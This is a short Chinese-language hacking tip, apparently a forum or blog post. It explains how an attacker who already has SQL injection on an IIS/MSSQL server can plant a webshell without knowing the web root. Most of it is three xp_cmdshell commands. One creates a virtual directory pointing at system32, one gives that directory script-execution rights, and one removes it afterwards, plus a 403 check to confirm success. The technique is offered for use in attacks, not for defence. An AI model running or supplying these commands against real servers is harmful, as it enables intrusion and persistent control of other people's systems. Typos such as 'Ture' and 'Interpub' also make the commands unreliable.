sql注入建立虛擬目錄，免得找web絕對(duì)路徑
----------------------------------------------------------------
我們很多情況下都遇到sql注入可以列目錄和運(yùn)行命令，但是卻很不容易找到web所在目錄，也就不好得到一個(gè)webshell，這一招不錯(cuò)：

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虛擬目錄win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
讓win句有解析asp腳本權(quán)限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
刪除虛擬目錄。
找不到web絕對(duì)路徑的一種解決辦法，
http://xxx.com/win
403錯(cuò)誤，表示虛擬目錄建好了。。。

最新評(píng)論